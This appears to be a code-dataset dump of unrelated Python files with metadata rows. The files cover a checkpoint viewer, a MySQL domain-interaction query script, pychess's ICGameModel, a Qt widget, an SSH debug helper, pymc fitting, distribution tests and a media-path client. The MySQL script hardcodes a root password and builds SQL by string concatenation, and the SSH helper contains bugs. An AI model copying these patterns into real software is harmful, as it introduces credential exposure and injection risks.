keep_every_n=self._keep_every_n)
def restore_part(self, other_model_dir, remap):
"""Restores part of the model from other directory.
Useful to initialize part of the model with another pretrained model.
Args:
other_model_dir: Model directory to load from.
remap: dict, remapping current parameters to the other model's.
"""
load_and_map_checkpoint(self._model, other_model_dir, remap)
def save_args(args):
if not os.path.exists(args.model_dir):
os.makedirs(args.model_dir)
with open(os.path.join(args.model_dir, 'args.json'), 'w') as f:
f.write(json.dumps(vars(args)))
def restore_args(args):
if not os.path.exists(args.model_dir):
raise Exception('{} does not exist'.format(args.model_dir))
with open(os.path.join(args.model_dir, 'args.json')) as f:
new_args = json.loads(f.read())
for arg in new_args:
if not hasattr(args, arg):
setattr(args, arg, new_args[arg])
def print_params(dct, indent=0):
for key in dct:
if isinstance(dct[key], dict):
print(" " * indent + str(key))
print_params(dct[key], indent + 2)
elif isinstance(dct[key], torch.Tensor):
print(" " * indent + key + " " + str(dct[key].size()))
else:
print(" " * indent + key + " = " + str(dct[key]))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Checkpoint Viewer')
parser.add_argument('--model_dir', type=str, default='')
args = parser.parse_args()
path = os.path.join(args.model_dir, 'checkpoint')
print("Loading model from %s" % path)
checkpoint = torch.load(path)
print_params(checkpoint)
| apache-2.0 | 1,880,076,072,383,120,600 | 31.982558 | 78 | 0.592279 | false | 3.737154 | false | false | false |
magic2du/contact_matrix | topologyTest/GetDDIsHaveOver2InterfacesHave16-20Examples.py | 1 | 2449 | import _mysql
from dealFile import *
#Get of Domains which has more than 2 interfaces have 16-20 examples
db=_mysql.connect(host="localhost",user="root",passwd="zxcv4321",db="DDI")
#db.query("""select COUNT(*) from PPI inner join example on (ID = PPI_ID) where domain1="ACT" and domain2="ACT" and topology_1 = 6 and topology_2 = 6""")
#db.query("""select * from PPI inner join example on (ID = PPI_ID) where domain1="ACT" and domain2="ACT" """)
ddiList=readDDIsFile('listOfDDIsHave2InterfacesOver15.txt')
ddis=[]
#Number of Domains which has 2 interfaces have more than 15 examples
for ddi in ddiList:
[domain1,domain2]=ddi
#print i
print domain1
print domain2
#query='SELECT DISTINCT topology_1,topology_2 from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'"'
#query='SELECT DISTINCT topology_1,topology_2 from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'"'
query='SELECT COUNT(DISTINCT topology_1,topology_2) from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'"'
#print query
#query='select domain1,domain2 from DDI1'
db.query(query)
result=db.store_result()
numTopology=result.fetch_row(0)
#print numTopology[0][0]
if int(numTopology[0][0])>1:
Ctr=False
query='SELECT DISTINCT topology_1,topology_2 from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'"'
db.query(query)
result=db.store_result()
rTopology=result.fetch_row(0)
numOver15=0
for val in rTopology[0:]:
[topology1,topology2]=val
try:
#print topology1+':'+topology2
query='SELECT COUNT(*) from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'" AND topology_1='+topology1+' AND topology_2='+topology2
print query
db.query(query)
result=db.store_result()
numExample=result.fetch_row(0)
print numExample[0][0]
except:
break
if int(numExample[0][0])>15:# if for those interfaces have more than 15 examples if they have less than 21 examples, add it.
if int(numExample[0][0])>20:
Ctr=False
break
else:
Ctr=True
if Ctr==True:
ddis.append(domain1+'_int_'+domain2)
writeListFile('listOfDDIsHaveOver2InterfacesHave15-20Examples.txt',ddis)
#print result.fetch_row()
#print r[0][0] readDDIsFile('listOfDDIsHave2InterfacesOver15.txt')
| gpl-2.0 | -4,267,599,292,644,156,000 | 44.351852 | 165 | 0.668028 | false | 3.269693 | false | false | false |
cajone/pychess | lib/pychess/ic/ICGameModel.py | 1 | 15072 | from __future__ import print_function
import threading
from pychess.compat import StringIO
from pychess.System.Log import log
from pychess.Utils.GameModel import GameModel
from pychess.Utils.Offer import Offer
from pychess.Utils.const import REMOTE, DRAW, WHITE, BLACK, RUNNING, WHITEWON, KILLED, \
TAKEBACK_OFFER, WON_CALLFLAG, WAITING_TO_START, BLACKWON, PAUSE_OFFER, PAUSED, \
RESUME_OFFER, DISCONNECTED, CHAT_ACTION, RESIGNATION, FLAG_CALL, OFFERS, LOCAL, \
ACTION_ERROR_NONE_TO_ACCEPT, UNFINISHED_STATES, ABORT_OFFER
from pychess.Players.Human import Human
from pychess.Savers import fen as fen_loader
from pychess.ic import GAME_TYPES, TYPE_TOURNAMENT_DIRECTOR
class ICGameModel(GameModel):
def __init__(self, connection, ficsgame, timemodel):
assert ficsgame.game_type in GAME_TYPES.values()
GameModel.__init__(self, timemodel, ficsgame.game_type.variant)
self.connection = connection
self.ficsgame = ficsgame
self.ficsplayers = (ficsgame.wplayer, ficsgame.bplayer)
self.gmwidg_ready = threading.Event()
connections = self.connections
connections[connection.bm].append(connection.bm.connect(
"boardUpdate", self.onBoardUpdate))
connections[connection.bm].append(connection.bm.connect(
"timesUpdate", self.onTimesUpdate))
connections[connection.bm].append(connection.bm.connect(
"obsGameEnded", self.onGameEnded))
connections[connection.bm].append(connection.bm.connect(
"curGameEnded", self.onGameEnded))
connections[connection.bm].append(connection.bm.connect(
"gamePaused", self.onGamePaused))
connections[connection.bm].append(connection.bm.connect(
"madeExamined", self.onMadeExamined))
connections[connection.bm].append(connection.bm.connect(
"madeUnExamined", self.onMadeUnExamined))
connections[connection.om].append(connection.om.connect(
"onActionError", self.onActionError))
connections[connection.cm].append(connection.cm.connect(
"kibitzMessage", self.onKibitzMessage))
connections[connection.cm].append(connection.cm.connect(
"whisperMessage", self.onWhisperMessage))
connections[connection.cm].append(connection.cm.connect(
"observers_received", self.onObserversReceived))
connections[connection].append(connection.connect("disconnected",
self.onDisconnected))
rated = "rated" if ficsgame.rated else "unrated"
# This is in the format that ficsgames.org writes these PGN headers
self.tags["Event"] = "FICS %s %s game" % (rated,
ficsgame.game_type.fics_name)
self.tags["Site"] = "freechess.org"
def __repr__(self):
string = GameModel.__repr__(self)
string = string.replace("<GameModel", "<ICGameModel")
fics_game = repr(self.ficsgame)
string = string.replace(", players=", ", ficsgame=%s, players=" % fics_game)
return string
@property
def display_text(self):
text = "[ "
if self.timed:
text += self.timemodel.display_text + " "
text += self.ficsgame.display_rated.lower() + " "
if self.ficsgame.game_type.display_text:
text += self.ficsgame.game_type.display_text + " "
return text + "]"
def __disconnect(self):
if self.connections is None:
return
for obj in self.connections:
# Humans need to stay connected post-game so that "GUI > Actions" works
if isinstance(obj, Human):
continue
for handler_id in self.connections[obj]:
if obj.handler_is_connected(handler_id):
log.debug("ICGameModel.__disconnect: object=%s handler_id=%s" %
(repr(obj), repr(handler_id)))
obj.disconnect(handler_id)
def ficsplayer(self, player):
if player.ichandle == self.ficsplayers[0].name:
return self.ficsplayers[0]
else:
return self.ficsplayers[1]
@property
def remote_player(self):
if self.players[0].__type__ == REMOTE:
return self.players[0]
else:
return self.players[1]
@property
def remote_ficsplayer(self):
return self.ficsplayer(self.remote_player)
def hasGuestPlayers(self):
for player in self.ficsplayers:
if player.isGuest():
return True
return False
@property
def noTD(self):
for player in self.ficsplayers:
if TYPE_TOURNAMENT_DIRECTOR in player.titles:
return False
return True
def onBoardUpdate(self, bm, gameno, ply, curcol, lastmove, fen, wname,
bname, wms, bms):
log.debug(("ICGameModel.onBoardUpdate: id=%s self.ply=%s self.players=%s gameno=%s " +
"wname=%s bname=%s ply=%s curcol=%s lastmove=%s fen=%s wms=%s bms=%s") %
(str(id(self)), str(self.ply), repr(self.players), str(gameno), str(wname), str(bname),
str(ply), str(curcol), str(lastmove), str(fen), str(wms), str(bms)))
if gameno != self.ficsgame.gameno or len(self.players) < 2:
# LectureBot allways uses gameno 1 for many games in one lecture
# or wname != self.players[0].ichandle or bname != self.players[1].ichandle:
return
log.debug("ICGameModel.onBoardUpdate: id=%d, self.players=%s: updating time and/or ply" %
(id(self), str(self.players)))
if self.timed:
log.debug("ICGameModel.onBoardUpdate: id=%d self.players=%s: updating timemodel" %
(id(self), str(self.players)))
# If game end coming from helper connection before last move made
# we have to tap() ourselves
if self.status in (DRAW, WHITEWON, BLACKWON):
if self.timemodel.ply < ply:
self.timemodel.paused = False
self.timemodel.tap()
self.timemodel.paused = True
self.timemodel.updatePlayer(WHITE, wms / 1000.)
self.timemodel.updatePlayer(BLACK, bms / 1000.)
if lastmove is None:
if bname != self.tags["Black"]:
self.tags["Black"] = self.players[
BLACK].name = self.ficsplayers[BLACK].name = bname
self.emit("players_changed")
if wname != self.tags["White"]:
self.tags["White"] = self.players[
WHITE].name = self.ficsplayers[WHITE].name = wname
self.emit("players_changed")
if self.boards[-1].asFen() != fen:
self.status = RUNNING
self.loadAndStart(
StringIO(fen),
fen_loader,
0,
-1,
first_time=False)
self.emit("game_started")
curPlayer = self.players[self.curColor]
curPlayer.resetPosition()
elif ply < self.ply:
log.debug("ICGameModel.onBoardUpdate: id=%d self.players=%s \
self.ply=%d ply=%d: TAKEBACK" %
(id(self), str(self.players), self.ply, ply))
for offer in list(self.offers.keys()):
if offer.type == TAKEBACK_OFFER:
# There can only be 1 outstanding takeback offer for both players on FICS,
# (a counter-offer by the offeree for a takeback for a different number of
# moves replaces the initial offer) so we can safely remove all of them
del self.offers[offer]
# In some cases (like lost on time) the last move is resent
# or we just observing an examined game
if self.reason != WON_CALLFLAG:
if len(self.moves) >= self.ply - ply:
self.undoMoves(self.ply - ply)
else:
self.status = RUNNING
self.loadAndStart(
StringIO(fen),
fen_loader,
0,
-1,
first_time=False)
self.emit("game_started")
curPlayer = self.players[self.curColor]
curPlayer.resetPosition()
elif ply > self.ply + 1:
self.status = RUNNING
self.loadAndStart(
StringIO(fen),
fen_loader,
0,
-1,
first_time=False)
self.emit("game_started")
curPlayer = self.players[self.curColor]
curPlayer.resetPosition()
def onTimesUpdate(self, bm, gameno, wms, bms):
if gameno != self.ficsgame.gameno:
return
if self.timed:
self.timemodel.updatePlayer(WHITE, wms / 1000.)
self.timemodel.updatePlayer(BLACK, bms / 1000.)
def onMadeExamined(self, bm, gameno):
self.examined = True
def onMadeUnExamined(self, bm, gameno):
self.examined = False
def onGameEnded(self, bm, ficsgame):
if ficsgame == self.ficsgame and len(self.players) >= 2:
log.debug(
"ICGameModel.onGameEnded: self.players=%s ficsgame=%s" %
(repr(self.players), repr(ficsgame)))
self.end(ficsgame.result, ficsgame.reason)
def setPlayers(self, players):
GameModel.setPlayers(self, players)
if self.players[WHITE].icrating:
self.tags["WhiteElo"] = self.players[WHITE].icrating
if self.players[BLACK].icrating:
self.tags["BlackElo"] = self.players[BLACK].icrating
def onGamePaused(self, bm, gameno, paused):
if paused:
self.pause()
else:
self.resume()
# we have to do this here rather than in acceptReceived(), because
# sometimes FICS pauses/unpauses a game clock without telling us that the
# original offer was "accepted"/"received", such as when one player offers
# "pause" and the other player responds not with "accept" but "pause"
for offer in list(self.offers.keys()):
if offer.type in (PAUSE_OFFER, RESUME_OFFER):
del self.offers[offer]
def onDisconnected(self, connection):
if self.status in (WAITING_TO_START, PAUSED, RUNNING):
self.end(KILLED, DISCONNECTED)
############################################################################
# Chat management #
############################################################################
def onKibitzMessage(self, cm, name, gameno, text):
if not self.gmwidg_ready.is_set():
self.gmwidg_ready.wait()
if gameno != self.ficsgame.gameno:
return
self.emit("message_received", name, text)
def onWhisperMessage(self, cm, name, gameno, text):
if gameno != self.ficsgame.gameno:
return
self.emit("message_received", name, text)
def onObserversReceived(self, other, gameno, observers):
if int(gameno) != self.ficsgame.gameno:
return
self.emit("observers_received", observers)
############################################################################
# Offer management #
############################################################################
def offerReceived(self, player, offer):
log.debug("ICGameModel.offerReceived: offerer=%s %s" %
(repr(player), offer))
if player == self.players[WHITE]:
opPlayer = self.players[BLACK]
else:
opPlayer = self.players[WHITE]
if offer.type == CHAT_ACTION:
opPlayer.putMessage(offer.param)
elif offer.type in (RESIGNATION, FLAG_CALL):
self.connection.om.offer(offer, self.ply)
elif offer.type in OFFERS:
if offer not in self.offers:
log.debug("ICGameModel.offerReceived: %s.offer(%s)" %
(repr(opPlayer), offer))
self.offers[offer] = player
opPlayer.offer(offer)
# If the offer was an update to an old one, like a new takebackvalue
# we want to remove the old one from self.offers
for offer_ in list(self.offers.keys()):
if offer.type == offer_.type and offer != offer_:
del self.offers[offer_]
def acceptReceived(self, player, offer):
log.debug("ICGameModel.acceptReceived: accepter=%s %s" %
(repr(player), offer))
if player.__type__ == LOCAL:
if offer not in self.offers or self.offers[offer] == player:
player.offerError(offer, ACTION_ERROR_NONE_TO_ACCEPT)
else:
log.debug(
"ICGameModel.acceptReceived: connection.om.accept(%s)" %
offer)
self.connection.om.accept(offer)
del self.offers[offer]
# We don't handle any ServerPlayer calls here, as the fics server will
# know automatically if he/she accepts an offer, and will simply send
# us the result.
def checkStatus(self):
pass
def onActionError(self, om, offer, error):
self.emit("action_error", offer, error)
#
# End
#
def end(self, status, reason):
if self.examined:
self.connection.bm.unexamine()
if self.status in UNFINISHED_STATES:
self.__disconnect()
if self.isObservationGame():
self.connection.bm.unobserve(self.ficsgame)
else:
self.connection.om.offer(Offer(ABORT_OFFER), -1)
self.connection.om.offer(Offer(RESIGNATION), -1)
if status == KILLED:
GameModel.kill(self, reason)
else:
GameModel.end(self, status, reason)
def terminate(self):
for obj in self.connections:
for handler_id in self.connections[obj]:
if obj.handler_is_connected(handler_id):
obj.disconnect(handler_id)
self.connections = None
GameModel.terminate(self)
def goFirst(self):
self.connection.client.run_command("backward 999")
def goPrev(self, step=1):
self.connection.client.run_command("backward %s" % step)
def goNext(self, step=1):
self.connection.client.run_command("forward %s" % step)
def goLast(self):
self.connection.client.run_command("forward 999")
def backToMainLine(self):
self.connection.client.run_command("revert")
| gpl-3.0 | -6,825,854,460,330,208,000 | 39.735135 | 105 | 0.558519 | false | 3.994699 | false | false | false |
robocomp/robocomp | tools/robocompdsl-gui/customListWidget.py | 1 | 1926 | from PySide2.QtWidgets import QListWidget
from PySide2.QtCore import Signal, Slot, Qt
from PySide2 import QtCore
class CustomListWidget(QListWidget):
customItemSelection = Signal()
def __init__(self, parent=None):
super(CustomListWidget, self).__init__(parent)
self.itemList = []
self.setMinimumSize(QtCore.QSize(160, 0))
self.setMaximumSize(QtCore.QSize(245, 16777215))
def mousePressEvent(self, event):
super(CustomListWidget, self).mousePressEvent(event)
item = self.itemAt(event.pos())
if item:
text = item.text().split(":")[0]
# check button clicked
if event.button() == Qt.LeftButton:
if (event.modifiers() == Qt.ShiftModifier) or (event.modifiers() == Qt.ControlModifier):
self.itemList.append(text)
else:
count = self.itemList.count(text)
self.clearItems()
for c in range(count + 1):
self.itemList.append(text)
elif event.button() == Qt.RightButton:
if text in self.itemList:
self.itemList.remove(text)
# update list text
count = self.itemList.count(text)
self.itemAt(event.pos()).setSelected(count)
if count:
self.itemAt(event.pos()).setText(text + ":" + str(count))
else:
# self.itemAt(event.pos()).setPlainText(text)
self.itemAt(event.pos()).setText(text)
self.customItemSelection.emit()
else:
self.clearItems()
def clearItems(self):
self.itemList = []
for pos in range(self.count()):
self.item(pos).setText(self.item(pos).text().split(":")[0])
# return our custom selected item list
def customItemList(self):
return self.itemList
| gpl-3.0 | -5,969,716,672,523,269,000 | 35.339623 | 104 | 0.562305 | false | 4.133047 | false | false | false |
manmeetsaini/etools | etools-module/execute.py | 1 | 4452 | ''' This module will enable/disable debug for ST Voice switches and
Voice switches, Phones and any generic machine using MS Windows.
_________________________________________________________________________________
|-- startdebug(self,device="switch",argv)
| argv options: sip,trunk,ssua,sb,ext
| device:"switch", "phone" ;
| key:cert key to be used
|
|-- savedebug(self)
|-- cleardebug(self)
class--debug(cls)--|
|-- setdebugenv(self,device="switch)
| "switch" option will enable following:
| - cli
| - trace_redirect 0
| - trace_redirect 1
| "Phone" option will enable following
| - TBA
|-- startTshark(self)
|-- stopTshark(self)
|-- uploadTshark(self,destination)
"will be uploaded to temp directory of script"
_____________________________________________________________________________________
++Changelist++
Version 1.0: Intial Program created
_________________________________________________________________________________
TODO
- Add all functions()
Questions & Feedback: Please contact etoolsclub.com
_________________________________________________________________________________
'''
import etools
import re
import string
import paramiko
import traceback
import sys
import os
from time import sleep
from etools import SSH
from utilities import Directory
login = paramiko.SSHClient()
class SendCommand(SSH):
def startDebug(self):
try:
ssh=self.login.invoke_shell()
ssh.send('cli \n')
sleep(3)
ssh.send('trace_redirect 0 \n')
sleep(3)
ssh.send('trace_redirect 1 \n')
sleep(3)
ssh.send('dbg "on sip" \n')
except Exception:
traceback.print_exc()
def stopDebug():
try:
ssh=self.login.invoke_shell()
ssh.send('dbg "clear" \n')
output= ssh.recv(65535)
path=Directory.create()
with open(r'temp\binarydata.log','wb') as f:
f.write(output)
f.close()
ssh.disconnect()
print ("Closing the SSH Session")
except Exception:
traceback.print_exc()
def sendTone(self ,tonetype):
try:
pass
except Exception:
traceback.print_exc()
def resetTone(self):
try:
pass
except Exception:
traceback.print_exc()
def startCapture(self,filters):
'''use Tshark utility'''
try:
pass
except Exception:
traceback.print_exc()
def stopCapture(self,filters):
try:
pass
except Exception:
traceback.print_exc()
def getCallID(self,samplefile):
samplefile="c:\\Python3\\sample.log"
startstring = "INVITE sip:"
endstring = "Content-Length:"
string = "CallID:"
try:
with open(samplefile , "rb") as infile:
for result in re.findall(b"INVITE sip:(.*?)Content-Length:", infile.read(), re.S): #This will find INVITE transaction
callid = re.findall(b"Call-ID:(.*?)\n", result, re.DOTALL) #This will find CallID within that INVITE Transaction
for i in callid: #Need to iterate list as findall creates a list.
print (i.decode("utf-8")) #This will convert Binary string to regular string
infile.close()
with open('Callid.log', 'wb') as f:
f.write(result)
f.close()
except Exception:
traceback.print_exc()
if __name__ == "__main__":
b = SendCommand()
b.connect()
b.startDebug()
b.stopDebug
| gpl-3.0 | 2,025,106,535,800,736,800 | 32.246154 | 160 | 0.431941 | false | 4.746269 | false | false | false |
sniemi/SamPy | statistics/bayesian/examples.py | 1 | 5785 | import pymc
def pymc_linear_fit_withoutliers(data1, data2, data1err=None, data2err=None,
print_results=False, intercept=True, nsample=50000, burn=5000,
thin=5, return_MC=False, guess=None, verbose=0):
"""
Use pymc to fit a line to data with outliers, assuming outliers
come from a broad, uniform distribution that cover all the data.
:param data1: xdata
:param data2: ydata
:param data1err: x errors
:param data2err: y errors
:param print_results: whether or not to print out the results
:param intercept: whether or not to fit for intercept
:param nsample: number of samples
:param burn: number of burn-in samples
:param thin: thinnening value
:param return_MC: whether or not to return the pymc MCMC instance
:param guess: initial guessues for slope and intercept
:param verbose: verbosity level of MCMC sampler
"""
if guess is None:
guess = (0, 0)
xmu = pymc.distributions.Uninformative(name='x_observed', value=0)
if data1err is None:
xdata = pymc.distributions.Normal('x', mu=xmu, observed=True, value=data1, tau=1, trace=False)
else:
xtau = pymc.distributions.Uninformative(name='x_tau', value=1.0 / data1err ** 2, observed=True, trace=False)
xdata = pymc.distributions.Normal('x', mu=xmu, observed=True, value=data1, tau=xtau, trace=False)
d = {'slope': pymc.distributions.Uninformative(name='slope', value=guess[0]),
'badvals': pymc.distributions.DiscreteUniform('bad', 0, 1, value=[False] * len(data2)),
'bady': pymc.distributions.Uniform('bady', min(data2 - data2err), max(data2 + data2err), value=data2)}
if intercept:
d['intercept'] = pymc.distributions.Uninformative(name='intercept', value=guess[1])
@pymc.deterministic(trace=False)
def model(x=xdata, slope=d['slope'], intercept=d['intercept'], badvals=d['badvals'], bady=d['bady']):
return (x * slope + intercept) * (True - badvals) + badvals * bady
else:
@pymc.deterministic(trace=False)
def model(x=xdata, slope=d['slope'], badvals=d['badvals'], bady=d['bady']):
return x * slope * (True - badvals) + badvals * bady
d['f'] = model
if data2err is None:
ydata = pymc.distributions.Normal('y', mu=model, observed=True, value=data2, tau=1, trace=False)
else:
ytau = pymc.distributions.Uninformative(name='y_tau', value=1.0 / data2err ** 2, observed=True, trace=False)
ydata = pymc.distributions.Normal('y', mu=model, observed=True, value=data2, tau=ytau, trace=False)
d['y'] = ydata
MC = pymc.MCMC(d)
MC.sample(nsample, burn=burn, thin=thin, verbose=verbose)
MCs = MC.stats()
m, em = MCs['slope']['mean'], MCs['slope']['standard deviation']
if intercept:
b, eb = MCs['intercept']['mean'], MCs['intercept']['standard deviation']
if print_results:
print "MCMC Best fit y = %g x" % (m),
if intercept:
print " + %g" % (b)
else:
print ""
print "m = %g +/- %g" % (m, em)
if intercept:
print "b = %g +/- %g" % (b, eb)
print "Chi^2 = %g, N = %i" % (((data2 - (data1 * m)) ** 2).sum(), data1.shape[0] - 1)
if return_MC:
return MC
if intercept:
return m, b
else:
return m
if __name__ == "__main__":
import numpy as np
import matplotlib.pyplot as plt
from pymc.Matplot import plot
#fake data [x, y, yerr, xyerr]
data = np.array([[201, 592, 61, 9],
[244, 401, 25, 4],
[47, 583, 58, 11],
[287, 402, 15, 7],
[203, 495, 21, 5],
[58, 173, 15, 9],
[210, 479, 27, 4],
[202, 504, 14, 4],
[198, 510, 30, 11],
[158, 416, 16, 7],
[165, 393, 14, 5],
[201, 442, 25, 5],
[157, 317, 52, 5],
[131, 311, 16, 6],
[166, 400, 34, 6],
[160, 337, 31, 5],
[186, 423, 42, 9],
[125, 334, 26, 8],
[218, 533, 16, 6],
[146, 344, 22, 5],
[150, 300, 23, 10],
[270, 620, 40, 15]])
#rename columns
xdata, ydata = data[:, 0], data[:, 1]
xerr, yerr = data[:, 3], data[:, 2]
#perform MCMC
MC = pymc_linear_fit_withoutliers(xdata, ydata, data1err=xerr, data2err=yerr, return_MC=True)
MC.sample(100000, burn=1000, verbose=0)
#show the results
fig = plt.figure()
#plot the confidence levels
low25 = np.linspace(20,300)*MC.stats()['slope']['quantiles'][2.5] + MC.stats()['intercept']['quantiles'][2.5]
top97 = np.linspace(20,300)*MC.stats()['slope']['quantiles'][97.5] + MC.stats()['intercept']['quantiles'][97.5]
plt.fill_between(np.linspace(20,300), low25, top97, color='k', alpha=0.1, label='2.5/97.5 quartile')
#plot the average results
plt.plot(np.linspace(20,300), np.linspace(20,300)*MC.stats()['slope']['mean'] + MC.stats()['intercept']['mean'],
color='k', linewidth=1, label='Average fit')
#plot data
plt.errorbar(xdata, ydata, xerr=xerr, yerr=yerr, color='b', label='data', fmt='o')
#show likely outliers
plt.plot(xdata[MC.badvals.value.astype('bool')], ydata[MC.badvals.value.astype('bool')], 'rs',
label='likely outliers')
plt.xlim(20, 300)
plt.legend(shadow=True, fancybox=True, scatterpoints=1, numpoints=1, loc='upper left')
plt.savefig('test.pdf')
plt.close()
#MCMC plot
plot(MC) | bsd-2-clause | -7,291,049,673,270,601,000 | 37.317881 | 116 | 0.557303 | false | 3.303826 | false | false | false |
j0r1/simpactcyan | src/tests/config/rundisttests.py | 1 | 2994 | #!/usr/bin/env python
import os
import sys
sys.path.append(os.path.realpath(os.path.join(os.path.realpath(__file__),"../../../../util")))
import histogram
import subprocess
settings = [
{
"type": "fixed",
"params": [ ("value", 0.5) ],
"plotrange": (-1, 1),
"f": "samples=100000;s=0.01;f(x,p) = 1.0/(sqrt(2.0*pi)*s)*exp(-(x-p)**2/(2*s**2))"
},
{
"type": "uniform",
"params": [ ("min", -1), ("max", 4) ],
"plotrange": (-2, 5),
"f": "H(x) = (x/abs(x)+1.0)/2.0 ; f(x,a,b) = 1.0/(b-a)*H(x-a)*H(b-x)"
},
{
"type": "beta",
"params": [ ("a", 2), ("b", 5), ("min", -2), ("max", 3) ],
"plotrange": (-3,4),
"f": "H(x) = (x/abs(x)+1.0)/2.0; f(x,a,b,k,l) = gamma(a+b)/(gamma(a)*gamma(b))*((x-k)/(l-k))**(a-1.0)*(1.0-((x-k)/(l-k)))**(b-1.0)*H(x-k)*H(l-x)/(l-k)"
},
{
"type": "gamma",
"params": [ ("a", 5), ("b", 1.5) ],
"plotrange": (0, 15),
"f": "f(x,a,b) = x**(a-1.0)*exp(-x/b)/(b**a*gamma(a))"
},
{
"type": "lognormal",
"params": [ ("zeta", 0.5), ("sigma", 0.25) ],
"plotrange": (0, 3),
"f": "f(x,z,s) = 1.0/(x*s*sqrt(2.0*pi))*exp(-(log(x)-z)**2/(2.0*s**2))"
}
]
for s in settings:
# Write config file for these settings
lines = [ ]
lines.append("test.dist.type = " + s["type"])
for p in s["params"]:
lines.append("test.dist." + s["type"] + "." + p[0] + " = " + str(p[1]))
data = "\n".join(lines)
fileName = "config-tmp-" + s["type"]
with open(fileName, "wt") as f:
f.write(data)
f.close()
# Run the executable with this config file
outName = "out-tmp-" + s["type"]
with open(outName, "wt") as f:
subprocess.call( [ "../../../build_ninja2/testconfig-opt-debug", fileName ], stdout=f)
f.close()
# Process generated value in histogram
h = histogram.Histogram(s["plotrange"][0], s["plotrange"][1], 100)
with open(outName, "rt") as f:
l = f.readline()
while l:
val = float(l)
h.process(val)
l = f.readline()
f.close()
histName = "hist-tmp-" + s["type"]
with open(histName, "wt") as f:
h.printProb(f)
f.close()
# Write gnuplot file
plotName = "plot-tmp-" + s["type"] + ".gnuplot"
pngName = "plot-tmp-" + s["type"] + ".png"
with open(plotName, "wt") as f:
print >>f, "set terminal png"
print >>f, "set style data lines"
print >>f, "set output '%s'" % pngName
print >>f, s["f"]
function = "f(x"
for p in s["params"]:
function += "," + str(float(p[1]))
function += ") "
print >>f, "plot [%g:%g] '%s', %s lt 3" % (s["plotrange"][0],s["plotrange"][1],histName,function)
subprocess.call( [ "gnuplot", plotName ])
os.unlink(plotName)
os.unlink(histName)
os.unlink(outName)
os.unlink(fileName)
| gpl-3.0 | 5,577,433,038,708,251,000 | 27.788462 | 159 | 0.462592 | false | 2.692446 | false | false | false |
kyokley/MediaConverter | path.py | 1 | 4835 | import requests
import os
from settings import (SERVER_NAME,
MEDIAVIEWER_TV_PATH_URL,
MEDIAVIEWER_MOVIE_PATH_URL,
WAITER_USERNAME,
WAITER_PASSWORD,
LOCAL_TV_SHOWS_PATHS,
LOCAL_MOVIE_PATHS,
VERIFY_REQUESTS,
)
from utils import postData
from log import LogFile
log = LogFile().getLogger()
class Path(object):
def __init__(self,
localpath,
remotepath):
self.localpath = localpath
self.remotepath = remotepath
def _post(self, useMovieURL=False):
if useMovieURL:
url = MEDIAVIEWER_MOVIE_PATH_URL
else:
url = MEDIAVIEWER_TV_PATH_URL
values = {'localpath': self.localpath,
'remotepath': self.remotepath,
'skip': False,
'server': SERVER_NAME,
}
postData(values, url)
def postMovie(self):
self._post(useMovieURL=True)
def postTVShow(self):
self._post(useMovieURL=False)
@classmethod
def _getPaths(cls, getMovies=False):
pathDict = dict()
if getMovies:
url = MEDIAVIEWER_MOVIE_PATH_URL
else:
url = MEDIAVIEWER_TV_PATH_URL
data = {'next': url}
while data['next']:
request = requests.get(data['next'], verify=VERIFY_REQUESTS, auth=(WAITER_USERNAME, WAITER_PASSWORD))
request.raise_for_status()
data = request.json()
if data['results']:
for result in data['results']:
pathDict.setdefault(result['localpath'], set()).add(result['pk'])
return pathDict
@classmethod
def getTVPaths(cls):
return cls._getPaths(getMovies=False)
@classmethod
def getMoviePaths(cls):
return cls._getPaths(getMovies=True)
@classmethod
def _getLocalPaths(cls, getMovies=False):
if getMovies:
filepaths = LOCAL_MOVIE_PATHS
else:
filepaths = LOCAL_TV_SHOWS_PATHS
return cls._buildLocalPaths(filepaths)
@staticmethod
def _buildLocalPaths(filepaths):
localpaths = set()
for localpath in filepaths:
if not os.path.exists(localpath):
log.error('{} does not exist. Continuing...'.format(localpath))
continue
res = set([os.path.join(localpath, path) for path in os.listdir(localpath) if path])
localpaths.update(res)
return localpaths
@classmethod
def getLocalTVPaths(cls):
return cls._getLocalPaths(getMovies=False)
@classmethod
def getLocalMoviePaths(cls):
return cls._getLocalPaths(getMovies=True)
@classmethod
def _getAllPaths(cls, getMovies=False):
''' Returns a dict of localpaths related to pathids
Local paths not in the server are represented with pathid -1.
'''
allPaths = cls._getPaths(getMovies=getMovies)
localPaths = cls._getLocalPaths(getMovies=getMovies)
for path in localPaths:
allPaths.setdefault(path, set()).add(-1)
return allPaths
@classmethod
def getAllTVPaths(cls):
return cls._getAllPaths(getMovies=False)
@classmethod
def getAllMoviePaths(cls):
return cls._getAllPaths(getMovies=True)
@classmethod
def _getPathByLocalPathAndRemotePath(cls,
localpath,
remotepath,
useMovieURL=False,
):
payload = {'localpath': localpath, 'remotepath': remotepath}
if useMovieURL:
url = MEDIAVIEWER_MOVIE_PATH_URL
else:
url = MEDIAVIEWER_TV_PATH_URL
request = requests.get(url,
params=payload,
verify=VERIFY_REQUESTS,
auth=(WAITER_USERNAME, WAITER_PASSWORD),
)
request.raise_for_status()
data = request.json()
return data
@classmethod
def getTVPathByLocalPathAndRemotePath(cls, localpath, remotepath):
return cls._getPathByLocalPathAndRemotePath(localpath,
remotepath,
useMovieURL=False)
@classmethod
def getMoviePathByLocalPathAndRemotePath(cls, localpath, remotepath):
return cls._getPathByLocalPathAndRemotePath(localpath,
remotepath,
useMovieURL=True)
| mit | -5,957,461,500,576,863,000 | 31.449664 | 113 | 0.53878 | false | 4.448022 | false | false | false |
openqt/algorithms | projecteuler/pe434-rigid-graphs.py | 1 | 1605 | #!/usr/bin/env python
# coding=utf-8
"""434. Rigid graphs
https://projecteuler.net/problem=434
Recall that a graph is a collection of vertices and edges connecting the
vertices, and that two vertices connected by an edge are called adjacent.
Graphs can be embedded in Euclidean space by associating each vertex with a
point in the Euclidean space.
A **flexible** graph is an embedding of a graph where it is possible to move
one or more vertices continuously so that the distance between at least two
nonadjacent vertices is altered while the distances between each pair of
adjacent vertices is kept constant.
A **rigid** graph is an embedding of a graph which is not flexible.
Informally, a graph is rigid if by replacing the vertices with fully rotating
hinges and the edges with rods that are unbending and inelastic, no parts of
the graph can be moved independently from the rest of the graph.
